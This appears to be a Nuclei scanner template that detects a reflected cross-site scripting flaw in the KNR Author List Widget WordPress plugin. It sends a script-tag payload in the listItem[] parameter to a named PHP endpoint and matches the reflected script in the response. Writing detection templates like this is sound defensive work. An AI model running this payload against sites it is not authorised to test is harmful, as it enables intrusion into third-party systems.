id: knr-widget-xss

info:
  name: KNR Author List Widget - Cross-site Scripting
  author: theamanrawat
  severity: medium
  description: |
    KNR Author List Widget suffers from Cross-site Scripting (XSS) in the listItem[] parameter.
  reference:
    - https://wordpress.org/plugins/knr-author-list-widget/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 1
  tags: xss,knr-author-list-widget,wordpress,wp,wp-plugin

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/knr-author-list-widget/knrAuthorListCustomSortSave.php?listItem[]=<script>alert(document.domain)</script>"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'item: <script>alert(document.domain)</script>'
          - 'Saved on'
        condition: and

      - type: word
        part: header
        words:
          - 'text/html'

      - type: status
        status:
          - 200

# digest: 490a00463044022052b3d6d068e4df3270132a64b0228bb72047e2493f809a7e45e09047338d1a580220339e64b0a32554f8132c1deede7b9395a0b37409eabf54364cf223d14838399e:922c64590222798bb761d5b6d8e72950
